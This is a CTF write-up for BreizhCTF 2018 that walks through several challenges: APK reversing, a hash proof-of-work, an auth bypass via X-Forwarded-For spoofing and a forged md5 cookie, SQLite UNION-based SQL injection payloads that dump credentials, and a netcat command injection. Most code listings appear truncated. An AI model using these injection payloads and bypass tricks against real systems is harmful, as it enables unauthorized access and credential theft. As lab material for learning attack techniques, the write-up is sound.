Information#
Version#
By | Version | Comment |
---|---|---|
noraj | 1.0 | Creation |
CTF#
- Name : BreizhCTF 2k18
- Website : www.breizhctf.com
- Type : On site
- Format : Jeopardy
75 - BabyAPK - Mobile#
Android reverse for dummys !
I already wrote how to decompile a mobile application for the Prime challenge at HITB CTF Singapore 2017.
Manually:
- Unpack the application.apk file with assets, resources, compiled code, etc... :
apktool d -r -s app.apk
- Convert Dex to java class:
d2j-dex2jar app/classes.dex
- Now take a look at the source:
jd-gui classes-dex2jar.jar
Automatically:
jadx-gui app.apk
The challenge is only about reversing a basic authentication scheme using xor with a hardcoded key:
1 | private boolean isPasswordValid(String password) { |
So let's use a short ruby script:
1 | str1 = ")79$#!&#^l\t<v\x00Q\x17\x11HOXyD2k:!\x18\x040@xy\x089g0\x01_\t\x1c#oGF^" |
The flag was BZHCTF{w3_4r3_r34lly_gl4d_70_533_y0u_w3lc0me}
.
100 - BreizhK0inM1n3r - Programming#
Bitcoin is dead... I mean almost dead! So SaxX decided to launch a new service! Time to earn some breizhcoins !
IP : 148.60.87.243 PORT : 9200
For this challenge we needed to generate 42 valid breizhcoins addresses.
Those addresses must be a sha512 hash beginning with 1337
. To prove we are not cheating we need to send the clear text that results in a such address.
1 | require 'socket' |
As the wifi network was sucking, I had to generate the list of clear text values...:
1 | require 'digest' |
... and send them manually:
1 | 26545 |
The flag was BZHCTF{Such_4_Pitty_S33m5_d47_b17c0in_c0ll4ps3d_Bu7_BreizhC0in_M19H7_B3_4n_4lt3n4t1v3!}
.
100 - Basique Simple Simple Basique - Web#
Vous n'avez pas les bases!
First the server is telling us we are not coming from localhost:
So I used X-Forwarded-For: 127.0.0.1
HTTP header to trick the server.
Afterward I added the header in Burp to avoid to repeat myself for each request:
Now the server is asking for authentication:
We can see we have a cookie, let's decode it
1 | $ printf %s 'ZmFsc2U2ODkzNGEzZTk0NTVmYTcyNDIwMjM3ZWIwNTkwMjMyNw==' | base64 -d |
It looks like false
is concatenated to a md5 hash. After having broken the hash we figured out that this was the md5 of false
.
So I built the same pattern for true
:
1 | $ printf %s 'true' | md5sum |
So after we sent this cookie we are redirected to this address: http://148.60.87.243:44915/Si_cest_marque_sur_internet_cest_ptetre_faux_mais_cest_ptetre_vrai
1 | <head><title>This is not the best language</title></head><body><h1>Welcome, Admin</h1><script src="http://cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script><div id="flag">flag</div><div id="doc"></div></body><script>$("#flag").click(function(){ |
The flag was BZHCTF{Ok_You_G0t_m3_It_was_T0o_eASy_4_YoU}
.
150 - Checksum Your Booty - Web#
This website uses a strong signature to protect against attacks. Prove them they sucks.
This form is vulnerable to SQL injection (SQLi) and is using SQLite at backend.
So we can retrieve the table name:
- payload:
" UNION SELECT tbl_name,1 FROM sqlite_master LIMIT 1;-- -
- output:
Welcome login !
Then the login and password of the first user:
- payload 1:
" UNION SELECT login,1 FROM login LIMIT 1 OFFSET 0;-- -
- output 1:
Welcome bzhctf !
- payload 2:
" UNION SELECT password,1 FROM login LIMIT 1 OFFSET 0;-- -
- output 2:
Welcome bar !
Finally we get the password of the second user:
- payload:
" UNION SELECT password,1 FROM login LIMIT 1 OFFSET 1;-- -
- output:
Welcome bzhctf{s1gn_my_455} !
The flag was bzhctf{s1gn_my_455}
.
50 - BabySys - System#
Hyper easy command injection:
1 | $ nc 148.60.87.243 50050 |
The flag was BZHCTF{wh3n_1_s4y_C0w_Y0u_s4y_C0w}
.
250 - Not Dead Yet - Programming#
Answer quickly to all the questions to get the flag.
IP : 148.60.87.243 PORT : 9100
The server is asking us the age of death of famous people. So we get the birthday date and death date of people and deduce the death age with a ruby script getting data from wikidata:
1 | require 'socket' |
The challenge server was too much unstable, laggy and buggy to allow us to flag but the script was fully working.